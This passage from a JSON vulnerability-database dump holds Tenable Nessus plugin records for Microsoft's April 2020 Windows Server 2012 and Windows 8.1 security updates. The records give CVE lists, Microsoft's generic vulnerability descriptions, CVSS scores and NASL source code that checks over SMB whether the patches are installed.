in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1000)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)", "edition": 5, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-04-14T00:00:00", "title": "KB4550971: Windows Server 2012 April 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1016", "CVE-2020-0967", "CVE-2020-0962", "CVE-2020-0687", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0946", "CVE-2020-0958", "CVE-2020-0987", "CVE-2020-0992", "CVE-2020-1008", "CVE-2020-0959", "CVE-2020-0956", "CVE-2020-0953", "CVE-2020-0938", "CVE-2020-0952", "CVE-2020-0993", "CVE-2020-0988", "CVE-2020-1014", "CVE-2020-1000", "CVE-2020-0821", "CVE-2020-1005", "CVE-2020-0999", "CVE-2020-0995", "CVE-2020-0960", "CVE-2020-0964", "CVE-2020-0982", "CVE-2020-1015", "CVE-2020-0955", "CVE-2020-1027", "CVE-2020-1020", "CVE-2020-0889", "CVE-2020-1009", "CVE-2020-0968", "CVE-2020-0966", "CVE-2020-1007", "CVE-2020-0936", "CVE-2020-1004", "CVE-2020-0994", "CVE-2020-0965"], "modified": "2020-04-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550917.NASL", "href": "https://www.tenable.com/plugins/nessus/135465", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135465);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/17\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0821\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0936\",\n \"CVE-2020-0938\",\n \"CVE-2020-0946\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0982\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1016\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\"\n );\n script_xref(name:\"MSKB\", value:\"4550971\");\n script_xref(name:\"MSKB\", value:\"4550917\");\n script_xref(name:\"MSFT\", value:\"MS20-4550971\");\n script_xref(name:\"MSFT\", value:\"MS20-4550917\");\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n\n script_name(english:\"KB4550971: Windows Server 2012 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550971\nor cumulative update 4550917. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1000)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\");\n # https://support.microsoft.com/en-us/help/4550971/windows-server-2012-update-kb4550971\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8d8c500e\");\n # https://support.microsoft.com/en-us/help/4550917/windows-server-2012-update-kb4550917\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ba6a0797\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4550971 or Cumulative Update KB4550917.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0992\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550971', '4550917');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550971, 4550917])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-18T21:08:45", "description": "The remote Windows host is missing security update 4550970\nor cumulative update 4550961. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0945,\n CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)", "edition": 5, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-04-14T00:00:00", "title": "KB4550970: Windows 8.1 and Windows Server 2012 R2 April 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1016", "CVE-2020-0967", "CVE-2020-0962", "CVE-2020-0687", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0946", "CVE-2020-0958", "CVE-2020-0987", "CVE-2020-0992", "CVE-2020-1008", "CVE-2020-1094", "CVE-2020-0959", "CVE-2020-0956", "CVE-2020-0953", "CVE-2020-0938", "CVE-2020-0952", "CVE-2020-0993", "CVE-2020-0945", "CVE-2020-0988", "CVE-2020-1014", "CVE-2020-0821", "CVE-2020-1005", "CVE-2020-0999", "CVE-2020-0995", "CVE-2020-0960", "CVE-2020-0964", "CVE-2020-0982", "CVE-2020-1015", "CVE-2020-0955", "CVE-2020-1027", "CVE-2020-1020", "CVE-2020-0889", "CVE-2020-1009", "CVE-2020-0968", "CVE-2020-0966", "CVE-2020-1007", "CVE-2020-0936", "CVE-2020-1004", "CVE-2020-0994", "CVE-2020-0965"], "modified": "2020-04-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550961.NASL", "href": "https://www.tenable.com/plugins/nessus/135471", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135471);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/17\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0821\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0936\",\n \"CVE-2020-0938\",\n \"CVE-2020-0945\",\n \"CVE-2020-0946\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0982\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0999\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1016\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\",\n \"CVE-2020-1094\"\n );\n script_xref(name:\"MSKB\", value:\"4550970\");\n script_xref(name:\"MSKB\", value:\"4550961\");\n script_xref(name:\"MSFT\", value:\"MS20-4550970\");\n script_xref(name:\"MSFT\", value:\"MS20-4550961\");\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n\n script_name(english:\"KB4550970: Windows 8.1 and Windows Server 2012 R2 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550970\nor cumulative update 4550961. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the\n 